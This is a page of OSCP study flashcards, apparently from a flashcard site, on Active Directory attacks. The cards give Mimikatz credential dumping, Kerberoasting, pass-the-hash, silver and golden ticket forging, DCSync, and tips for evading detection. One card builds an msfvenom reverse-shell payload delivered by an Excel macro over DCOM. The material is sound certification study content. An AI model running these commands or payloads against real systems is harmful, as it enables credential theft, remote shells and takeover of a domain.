OSCP > Active Directory Attacks > Flashcards

Active Directory Attacks Flashcards

(50 cards)

Study These Flashcards
1
Q

What is a Domain Controller?

A
  • Windows 2000-2019 server with Active Directory Domain Services role installed
  • The hub and core of AD because it stores all information about how the specific instance of AD is configured
  • The DC also enforces a vast array of rules that govern how objects w/in a given Windows domain interact with each other, and what tools are available to end users
  • When an instance of AD is configured, a ‘domain’ is created with a name such as ‘corp.com’ where ‘corp’ is the name of the organization.
  • Within this domain we can add various types of objects, including computers and user objects
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

What is an OU?

A
  • Organization Unit
  • Comparable to file system folders that are used to store and group objects together
  • Computer objects represent actual servers and workstations that are domain-joined
  • User objects represent employees of the organization
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

AD Enumeration

A
  • Begins with the exploit or client-side attack against a domain workstation or server, followed by enumeration of the AD environment
  • We then target high-value groups, such as the Domain Admins group to gain complete control of every single computer
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

AD Enumeration: Traditional Approach

A
  1. Enumerate all local accounts
    - - C:\Users\Offsec.corp> net user
  2. Enumerate all users in the entire domain
    - - C:\Users\Offsec.corp> net user /domain
  3. Query individual user account
    - - C:\Users\Offsec.corp> net user jeff_admin /domain
  4. Enumerate all groups in the domain
    - - C:\Users\Offsec.corp> net group /domain
    * ** Shortcoming of this approach is that net.exe cannot list nested groups and only shows the direct user members
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

AD Enumeration: Modern Approach

A
  • Using PowerShell and LDAP
    1. Get the ‘domain’ name
    – PS C:\Users\offsec.CORP> [System.DirectoryServices.ActiveDirectory. Domain]::GetCurrent Domain()
    ** Get the ‘PdcRoleOwner’ and ‘Name’ properties **
    PdcRoleOwner : DC01.corp.com
    Name : corp.com
    ________________________________________
    2. Build PowerShell script (Build LDAP path)
    $domainObj = [System.DirectoryServices.ActiveDirectory. Domain]::GetCurrentDomain()
    $PDC = ($domainObj.PdcRoleOwner).Name
    $SearchString = “LDAP://”
    $SearchString += $PDC + “/”
    $DistinguishedName = “DC=$($domainObj.Name.Replace(‘.’, ‘,DC=’))”
    $SearchString += $DistinguishedName
    $SearchString
    ** Results in the following: LDAP://DC01.corp.com/DC=corp,DC=com
    ________________________________________
    3. Build PowerShell script (Searcher)
    $Searcher = New-Object System.DirectoryServices.DirectorySearcher ([ADSI]$SearchString)
    $objDomain = New-Object System.DirectoryServices.DirectoryEntry
    $Searcher.SearchRoot = $objDomain
    _______________________________________
    4. Build PowerShell Script (samAccountType)
    **     We want to list all users in the domain, so we use 0x30000000 (decimal 805306368)
    $Searcher.filter=”samAccountType=805306368”
    $Searcher.FindAll()
    *** The output is a little messy, so we can clean this up a little bit **
    ________________________________________
    5. Build PowerShell Script (cleaner print)
    Foreach($obj in $Result)
    {
    Foreach($prop in $obj.Properties)
    {
    $prop
    }
    Write-Host “————————”
    }
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

AD Enumeration: Unravel nested groups

A 
1. Adjust the PowerShell script from above to print out all groups in the domain:
$Searcher.SearchRoot = $objDomain
$Searcher.filter="(objectClass=Group)"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
$obj.Properties.name
}
*** When executed the groups are displayed ***
...
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy
Secret_Group
Nested_Group
Another_Nested_Group
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
2. We can get the members of 'Secret_Group':
$Searcher.filter="(name=Secret_Group)"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
$obj.Properties.member
}
**** According to this output, 'Nested_Group' is a member of this group ****
CN=Nested_Group,OU=CorpGroups,DC=corp,DC=com
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
3. Alter to get the members of 'Nested_Group':
$Searcher.filter="(name=Nested_Group)"
**** According to this output, 'Another_ Nested_Group' is a member of this group ****
CN=Another_Nested_Group, OU=CorpGroups,DC=corp,DC=com
\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What is the concept behind finding currently logged on users?

A

** We want to find logged-in users that are members of high-value groups since their credentials will be cached in memory,
and we can steal their credentials and authenticate with them **
- We must tailor our enumeration to consider not only ‘Domain Admins’ but also potential avenues of “chained compromise”, including a hunt for a “derivative local admin”

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What tools are helpful with enumerating currently logged on users?

A
  1. NetSessionEnum API (Get-NetSession)
    - Can be used as a regular domain user
    - Returns a list of active users on servers such as fileservers or domain controllers
  2. NetWkstaUserEnum API (Get-NetLoggedon)
    - After compromising a domain machine, we should enumerate every computer in the domain and then use NetWkstaUserEnum against the obtained list
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

AD Enumeration: Currently Logged on Users

A

*** Use PowerView.ps1
PS C:\Tools\active_directory> Import-Module .\PowerView.ps1
__________________________________
1. Enumerate logged-in users with Get-NetLoggedon along with the -ComputerName option and specify a workstation
– PS C:\Tools\active_directory> Get-NetLoggedon -ComputerName client251
__________________________________
2. Let’s try to retrieve active sessions on the domain controller DC01
– PS C:\Tools\active_directory> Get-NetSession -ComputerName dc01

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Explain Service Principal Names

A
  • Services launched by the system itself use the context based on a Service Account
  • Isolated applications can use a set of predefined accounts: LocalSystem, LocalService, and NetworkService
  • When applications like Exchange, SQL, or IIS are integrated into AD, a unique service instance known as Service Principal Name (SPN) is used to associate a service on a specific server to a service account in AD
  • *** By enumerating all the SPNs in the domain, we can obtain the IP address and port number of applications running on servers integrated with the target AD **
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

AD Enumeration: SPNs

A
  1. Update our PS script for SPN http, indicating the presence of a registered web server
    $Searcher.filter=”serviceprincipalname=http
    $Result = $Searcher.FindAll()
    Foreach($obj in $Result)
    {
    Foreach($prop in $obj.Properties)
    {
    $prop
    }
    }
    __________________________________
    - Output shows an SPN with the following information:
    – samaccountname {iis_service}
    – serviceprincipalname {HTTP/CorpWebServer.corp.com}
    *** From here we can run Nslookup and go to the URL CorpWebServer.corp.com
    – PS C:\Users\offsec.CORP> nslookup CorpWebServer.corp.com
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

What 2 authentication types are used by AD?

A
  • Kerberos(default)

- NTLM

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

NTLM Authentication

A
  • Uses a challenge and response
  • Used in one of 3 cases:
    1. when a client authenticates to a server by IP address (instead of hostname)
    2. when a user attempts to authenticate to a hostname that is not registered on the AD integrated DNS server
    3. applications may choose to use NTLM
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Kerberos Authentication

A
  • Uses a ticket system
  • Kerberos client authentication to a service in AD involves the use of a DC in the role of a KDC (Key Distribution Center)
  • Hashes are stored in LSASS memory space
  • Need SYSTEM privs to access LSASS
  • Mimikatz is helpful with this
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What is the best way to use Mimikatz against LSASS as a general rule of thumb?

A
  • Avoid using Mimikatz as a standalone application, due to detection signatures
  • Instead:
    1. execute Mimikatz directly from memory using an injector like PowerShell
    2. Use a built-in tool like Task Manager to dump the entire LSASS process memory, move the dumped data to a helper machine, and from there load the data into Mimikatz
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

How would we use Mimikatz on a Windows target as standalone application with a user that has local admin?

A
  1. Start Mimikatz and use ‘privilege::debug’ and ‘sekurlsa::logonpasswords’
    – C:\Tools\active_directory> mimikatz.exe
    mimikatz # privilege::debug
    – Privilege ‘20’ OK
    mimikatz # sekurlsa::logonpasswords
    _________________________________
  2. We get all credential information for the user ‘Offsec’
    * NTLM : e2b475c11da2a0748290d87aa966c327
    * SHA1 : 8c77f430e4ab8acb10ead387d64011c76400d26e
    _________________________________
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

What can we do after we obtain password hashes with Mimikatz, what can we do?

A
  • exploit Kerberos authentication by abusing TGT and service tickets
  • Kerberos TGT and service tickets for users currently logged onto the local machine are stored for future use
  • These tickets are also stored in LSASS and we can use Mimikatz to interact with and retrieve our own tickets and the tickets of local users
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

How can we use Mimikatz to get currently logged on users Kerberos TGT and TGS tickets?

A

– mimikatz # sekurlsa::tickets

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

What can we do with a Kerberos TGT ticket?

A
  • We could request a TGS for a specific resource we want to target w/in the domain
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

How can we use Kerberos for Service Account Attacks?

A
  • When a user wants to access a resource hosted by a SPN, the client requests a service ticket that is generated by the DC
  • The service ticket is then decrypted and validated by the application server, since it is encrypted through the password hash of the SPN
  • When requesting the service ticket from the DC, no checks are performed on whether the user has any permissions to access the service hosted by the SPN
  • These checks are performed as a second step only when connecting to the service itself
  • This means that if we know the SPN we want to target, we can request a service ticket for it from the DC
  • Then, since it is our own ticket, we can extract it from local memory and save it to disk
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

How can we request the Kerberos service ticket for the SPN ‘HTTP/CorWebServer.corp.com?

Study These Flashcards
A
  • From PowerShell we can use the KerberosRequestorSecurityToken class to request the service ticket
  • The code segment we need is located inside the System.IdentityModel, which is not loaded into PowerShell by default
  • To load it, we use the Add-Type cmdlet with the -AssemblyName argument
    – Add-Type -AssemblyName System.IdentityModel
    ——————————–
    ** Now we are ready to request the Kerberos Service Ticket
    – New-Object System.IdentityModel.Tokens. KerberosRequestorSecurityToken -ArgumentList ‘H
    TTP/CorpWebServer.corp.com’
    ———————————–
    **     After execution, the requested service ticket should be generated by the DC and loaded into the memory of the Windows 10 client
22
Q

What is another way to list Kerberos tickets, besides Mimikatz?

Study These Flashcards
A
  • ‘klist’ will display all cached Kerberos tickets for the current user
    • PS C:\Users\offsec.CORP> klist
23
Q

How do we download Kerberos Service Tickets from memory with Mimikatz?

Study These Flashcards
A

– mimikatz # kerberos::list /export

24
Q

What tool can we use to try and and crack encrypted Kerberos Service Tickets?

Study These Flashcards
A
  • kerberoast

- - kali@kali:~$ sudo apt update && sudo apt install kerberoast

25
How do we use Kerberoast to crack a Kerberos Service Ticket?
- use tgsrepcrack.py - provide a wordlist - provide the downloaded encrypted service ticket -- kali@kali:~$ python /usr/share/kerberoast/tgsrepcrack.py wordlist.txt 1-40a50000-Offse c@HTTP~CorpWebServer.corp.com-CORP.COM.kirbi
26
PtH
- Pass The Hash allows an attacker to authenticate to a remote system or service using a user's NTLM hash instead of a plaintext password - The attacker connects to victim using SMB and performs authentication using NTLM hash - Most tools that exploit PtH start a Windows service (ex. cmd.exe or PowerShell) and communicate with it using Named Pipes - This is done using the ServiceControlManager API - This requires an SMB connection through the firewall and the Windows File and Print Sharing feature to be enabled - Note: this will NOT work for Kerberos authentication but only for NTLM
27
What are some PtH tools?
- PsExec - Passing-the-hash toolkit - Impacket
28
How do you use PTH Toolkit on a Windows machine (10.11.0.22) if you have a valid hash for the user Offsec?
-- kali@kali:~$ pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee :2892d26cdf84d7a70e2 eb3b9f05c425e //10.11.0.22 cmd
29
Overpass the Hash
* ** Ideas is that we turn the NTLM hash into a Kerberos ticket and avoid the use of NTLM authentication - we can "over" abuse the NTLM user hash to gain a full Kerberos Ticket Granting Ticket (TGT) or service ticket - this grants us access to another machine or service as that user
30
How can we initiate Overpass the Hash with users 'Offsec' and 'Jeff_Admin'?
* ** We need to first get the NTLM credentials cached 1. Log into Windows 10 machine as Offsec user 2. Right-click on application (i.e. Notepad) and run as different user ('Jeff_Admin') 3. This prompts authentication and we provide the username and password of Jeff_Admin 4. After successful authentication, Jeff_Admin's credentials will be cached 5. We can validate this with: - - mimikatz # sekurlsa::logonpasswords * ** We now have Jeff_Admin's credentials cached, and can proceed with Overpassing the Hash by using 'sekurlsa::pth'
31
Once the NTLM credentials have been cached, how can we Overpass the Hash for the user Jeff_Admin?
1. We use the 'sekurlsa::pth' from Mimikatz -- mimikatz # sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d 87aa966c327 /run:PowerShell.exe *** We now have a PowerShell session as Jeff_Admin ---------------------------------- 2. Next, we need to generate a TGT by authenticating to a network share on the DC with 'net use' -- PS C:\Windows\system32> net use \\dc01 --------------------------------------- 3. Now we have a cached Kerberos TGT which can be validated with 'klist' -- PS C:\Windows\system32> klist -------------------------------------- 4. Now we can run PSExec and launch a cmd terminal as remotely on the DC01 machine as Jeff_Admin -- PS C:\Tools\active_directory> .\PsExec.exe \\dc01 cmd.exe -- C:\Windows\system32> whoami -- corp\jeff_admin
32
What is one issue of Kerberos TGT?
- can only be used on the machine it was created for
33
Explain 'Pass the Ticket'
- Takes advantage of the TGS, which may be exported and re-injected elsewhere on the network - Can then be used to authenticate to a specific service - Additionally, if the TGS (service ticket) belongs to the current user, then no administrative privileges are required
34
If we have a service account NTLM hash, what can we do with respects to Kerberos service tickets? What is this called?
- We can forge our own service ticket to access the target resource (ex. IIS application) with any permission we desire - This custom-created ticket is known as the 'Silver Ticket' - If the SPN is used on multiple servers, the Silver Ticket can be used against them all
35
What do we need to obtain in order to create a Silver Ticket?
- The SID of the domain
36
What are the elements of an SID?
* ** S-R-I-S - S = 'S' to identify the string as SID - R = Revision Level; Usually set to '1' - I = Identifier-authority value; '5' - S = Subauthority values
37
What is the Subauthority Value of an SID?
- Dynamic value consisting of: 1. Domain's 'Numeric Identifier * ** This is the first four parts of the Subauthority value 2. RID (Relative Identifier) representing the specific object in the Domain * ** The last number of the SID
38
What command allows us to get the SID?
-- C:\>whoami /user
39
What is required to create a Kerberos Silver Ticket?
1. username 2. domain name 3. domain SID 4. fully qualified host name of the service 5. the service type 6. password hash of the service account
40
Give an example of a Kerberos Silver Ticket generation
-- mimikatz # kerberos::golden /user:offsec /domain:corp.com /sid:S-1-5-21-1602875587-278 7523311-2599479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:E2B475C11DA2A0748 290D87AA966C327 /ptt --------------------------------------- *** The generated Silver Ticket is injected directly into memory with the /ppt flag
41
What is DCOM
- Microsoft Object Model - System for creating software components that interact with each other - It was extended to the Distributed Component Object Model (DCOM) for interaction between multiple computers over a network
42
What does exploitation of DCOM require
- Microsoft Office
43
Provide an example of how to exploit DCOM
1. Create a $com object with the program identifier for Excel along with the IP address of the remote workstation. -- $com = [activator]::CreateInstance([type]:: GetTypeFromProgId("Excel.Application", "192 .168.1.110")) ------------------------------------------ 2. Generate shellcode -- kali@kali:~$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.111 LPORT=4444 -f h ta-psh -o evil.hta ----------------------------------------- 3. Create Macro in Excel, save as .xls -- Sub MyMacro() -- Dim Str As String -- Str = Str + "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4Ad" -- Str = Str + "ABQAHQAcgBdADoAOgBTAGkAegBlACAAL QBlAHEAIAA0ACkAewA" -- ... -- Str = Str + "EQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAF AAcgBvAGMAZQBzAHM" -- Str = Str + "AXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=" -- Shell (Str) End Sub ------------------------------------------ 4. Copy file to target machine using System.IO.File::Copy, flag that the destination file should be overwritten ($True) -- $LocalPath = "C:\Users\jeff_admin.corp \myexcel.xls" -- $RemotePath = "\\192.168.1.110\c$\ myexcel.xls" -- [System.IO.File]::Copy($LocalPath, $RemotePath, $True) ------------------------------------------ 5. Create $Workbook object off of the $Com object with the Open method -- $Workbook = $com.Workbooks.Open("C:\myexcel.xls") **** Results in an error, so have to create a Desktop folder at C:\Windows\SysWOW64\config\systemprofile -- $Path = "\\192.168.1.110\c$\Windows\sysWOW64\ config\systemprofile\Desktop" -- $temp = [system.io.directory]::createDirectory($Path) ----------------------------------------- 6. Start NC listener: -- PS C:\Tools\practical_tools> nc.exe -lvnp 4444 ----------------------------------------- 7. Run the macro $com.Run("mymacro")
44
Golden Ticket Exploit Explanation
* ** A Golden Ticket is a custom self-made TGTs *** - This is an AD Persistence attack - When a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDC in the domain - This secret key is actually the password hash of a domain user account called 'krbtgt' - If we are able to get a hold of the 'krbtgt' password hash, we could create our own self-made custom TGTs, or Golden Tickets * ** With this we could create a TGT stating that a non-privileged user is actually a member of the Domain Admins group, and the DC will trust it since it is correctly encrypted
45
Golden Ticket Example
*** We should have an account that is a member of the Domain Admins group, or have compromised the DC itself *** --------------------------------------- 1. Extract the 'password hash' of the 'krbtgt' account by logging into the DC and run Mimikatz from the C:\> folder and issue lsadump::lsa -- mimikatz # privilege::debug --------- Privilege '20' OK --mimikatz # lsadump::lsa /patch *** This gives us the 'krbtgt' user password hash *** User : krbtgt LM : NTLM : 75b60230a2394a812000dbfad8415965 --------------------------------------- 2. Before generating the Golden Ticket, delete any existing Kerberos tickets -- mimikatz # kerberos::purge ---------------------------------------- 3. Provide the username 'fakeuser' and domain SID, along with the 'krbtgt' hash -- mimikatz # kerberos::golden /user:fakeuser /domain:corp.com /sid:S-1-5-21-1602875587-2 787523311-2599479668 /krbtgt:75b60230a2394a812000dbfad8415965 /ptt *** Note that /krbtgt is used to indicate the password hash is being suplied *** Similar to when we created the Silver Ticket, the generated Golden Ticket is injected directly into memory with the /ppt flag -------------------------------------------- 4. With the Golden Ticket injected into memory, we can launch a new command prompt with 'misc::cmd' and attempt lateral movements with PsExec: -- mimikatz # misc::cmd -- C:\Users\offsec.crop> psexec.exe \\dc01 cmd.exe
46
What is the Domain Controller Synchronization lateral movement attack
- Domains typically have more than one domain controller to provide redundancy - The 'Directory Replication Service Remote Protocol' uses 'replication' to synchronize these redundant domain controllers. - A DC may request an update for a specific object, like an account, with the 'IDL_DRSGetNCChanes' API * ** The DC receiving the request for an update does not verify that the request came from a known DC, but only that the associated SID has appropriate privs. - If we attempt to issue a rogue update request to a DC from a user who is a member of the Domain Admins group, it will succeed
47
Example of Domain Controller Synchronization
1. Use Mimikatz to start the replication using 'lsadump::dcsync' with the /user option to indicate the target user to sync -- mimikatz # lsadump::dcsync /user:Administrator *** Provides the hash *** -- Credentials: Hash NTLM: e2b475c11da2a0748290d87aa966c327
48
How does Kerberos authentication work?
1. When a user logs in, they receive a TGT (Ticket Granting Ticket) 2. The TGT is signed by the 'krbtgt' account and is treated as the user's proof of identity 3. With a TGT, the user can request 'service tickets' (TGS) for specific resources within the domain. 4. Part of a TGS is encrypted with the NT hash (NTLM) of the service account for the requested resource. 5. Windows uses Service Principal Names (SPNs) to identify which service is being used to encrypt the TGS.
49
What are the 2 types of SPNs? | Which type is useful for Kerberoasting attacks?
1. Host-based SPNs, linked to the computer (useless) | 2. Domain user account SPNs (used for kerberoasting)
50
How are SPNs used in Kerberoasting attacks?
- Any domain user can request a TGS from a DC for any service that has a registered SPN - When the TGS is generated, the DC does not check whether the requesting user is authorized to access the resource in question - A hacker can use this ticket offline to figure out the password for the service account...since the ticket has been encrypted with the NT hash of the service account
OSCP
flashcards
Decks in class (14)
# Cards
Brainscape helps you reach your goals faster, through stronger study habits.
© 2026 Bold Learning Solutions. Terms and Conditions